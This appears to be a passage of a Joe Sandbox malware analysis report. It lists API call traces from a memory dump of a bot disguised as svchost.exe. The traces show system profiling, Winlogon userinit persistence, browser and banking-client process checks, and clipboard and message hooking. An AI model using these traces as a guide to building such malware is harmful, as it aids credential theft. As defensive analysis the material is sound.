                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB560B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02BB561B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02BB562C
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB566C
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB567B
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB568C
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02BB569F
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB56B3
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56C0
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB56D0
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB56E1
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BB56F3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5707
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5714
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02BB5724
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02BB5735
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5760
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB576F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB5783
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB5796
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57AA
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57B7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB57C7
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB57D8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB57EC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB57F9
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02BB5809
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 02BB581A
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB5820
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB5843
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB5875
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5884
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5895
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB58A8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB58BC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58C8
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB58D8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB58E6
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,75573490), ref: 02BB4987
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                                  • Part of subcall function 02BB4900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,75573490), ref: 02BB419D
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                                  • Part of subcall function 02BB4180: HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: memset.MSVCRT ref: 02BB4503
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,75573490), ref: 02BB450E
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: Process32First.KERNEL32 ref: 02BB4531
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: GetHandleInformation.KERNEL32(00000000,?), ref: 02BB454D
                                                                                                                                                                                                                  • Part of subcall function 02BB44D0: CloseHandle.KERNEL32(00000000), ref: 02BB4567
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,75573490,?,?,?,?,02BB5903,00000000), ref: 02BB475A
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47A5
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02BB5903,00000000,00000000,00000000), ref: 02BB47AC
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: memset.MSVCRT ref: 02BB47BF
                                                                                                                                                                                                                  • Part of subcall function 02BB4710: _snprintf.MSVCRT ref: 02BB480A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB5913
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BB5924
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                                • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                                • API String ID: 2738427392-2715564829
                                                                                                                                                                                                                • Opcode ID: b62a16d44b0a8ae23f7bbeec78d43a0be3e2d9dcbf744c79f8e2c8b5eefaa1c3
                                                                                                                                                                                                                • Instruction ID: 5ccde02bcb3cefbc70dc628a6fa62c2e70b19bc150c9d82681cc1931ee991ba1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b62a16d44b0a8ae23f7bbeec78d43a0be3e2d9dcbf744c79f8e2c8b5eefaa1c3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFA2FA70A81318BEFB619B948C4AFEE7B78EF45B04F604584F341BA1C0D7F46A458B69
                                                                                                                                                                                                                Function 02BC6CA0 Relevance: 300.2, APIs: 136, Strings: 35, Instructions: 960threadmemorysynchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                                  • Part of subcall function 02BB3300: RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC6CAE
                                                                                                                                                                                                                  • Part of subcall function 02BD5A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                                  • Part of subcall function 02BD5A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                                  • Part of subcall function 02BD5A50: _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02BC6CC0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02BC6CCB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BC6CDF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC6CFB
                                                                                                                                                                                                                • GetCommandLineA.KERNEL32 ref: 02BC6D05
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 02BC6D3D
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB68), ref: 02BC6D65
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC6D86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6DA4
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6DC5
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6DDF
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC6DE9
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC3530,00000000,00000000,00000000), ref: 02BC6E38
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6E4C
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6E5D
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC7DD0,00000000,00000000,00000000), ref: 02BC6E8C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6EA0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6EB1
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC8080,00000000,00000000,00000000), ref: 02BC6EC6
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,9E938F4Aa), ref: 02BC6ED6
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6EF6
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6F17
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(9E938F4Aa,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6F34
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 02BC6F3E
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB80), ref: 02BC6F49
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC79D0,00000000,00000000,00000000), ref: 02BC6F5B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6F6B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6F7C
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,75570F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                                  • Part of subcall function 02BB6DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC6970,00000000,00000000,00000000), ref: 02BC6F91
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FA1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC6FB2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BC54B0,00000000,00000000,00000000), ref: 02BC6FDC
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FF0
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7001
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7010
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC7013
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7020
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC7023
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BC7047
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BC7059
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 02BC7065
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC7074
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02BC7090
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02BC70B7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\java.exe), ref: 02BC70CD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02BC70E3
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02BC70F9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02BC710F
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02BC7125
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02BC713B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02BC7151
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02BC7167
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02BC717D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02BC7193
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02BC71A9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02BC71BF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC71D5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BC71EB
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCB8F0,00000000,00000000,00000000), ref: 02BC7219
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7233
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7240
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCEF80,00000000,00000000,00000000), ref: 02BC7255
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7269
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7276
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD0560,00000000,00000000,00000000), ref: 02BC728B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC729F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC72AC
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD0E20,00000000,00000000,00000000), ref: 02BC72C1
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC72D5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC72E2
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCF6A0,00000000,00000000,00000000), ref: 02BC72F7
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC730B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7318
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCCB80,00000000,00000000,00000000), ref: 02BC732D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7341
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC734E
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCCC20,00000000,00000000,00000000), ref: 02BC7363
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7377
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7384
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD1590,00000000,00000000,00000000), ref: 02BC7399
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73AD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC73BA
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD24D0,00000000,00000000,00000000), ref: 02BC73CF
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73E3
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC73F0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD31C0,00000000,00000000,00000000), ref: 02BC7405
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7419
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7426
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD32B0,00000000,00000000,00000000), ref: 02BC743B
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC744F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC745C
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCFE80,00000000,00000000,00000000), ref: 02BC7471
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7485
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7492
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3480,00000000,00000000,00000000), ref: 02BC74A7
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74BB
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC74C8
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD43F0,00000000,00000000,00000000), ref: 02BC74DD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74F1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC74FE
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD47D0,00000000,00000000,00000000), ref: 02BC7513
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7527
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7534
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02BC5757
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                                  • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD19A0,00000000,00000000,00000000), ref: 02BC7549
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC755D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC756A
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD1C80,00000000,00000000,00000000), ref: 02BC757F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7593
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC75A0
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BB80C0,00000000,00000000,00000000), ref: 02BC75B5
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC75CD
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC75E6
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02BC75FD
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02BC7613
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02BC7625
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02BC7637
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02BC7649
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\core.exe), ref: 02BC765B
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02BC766D
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02BC767F
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 02BC76EC
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC76FB
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC7714
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BC771B
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BC7731
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BBBC50,00000000,00000000,00000000), ref: 02BC7745
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC775D
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC776E
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02BC7783
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC779B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC77AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
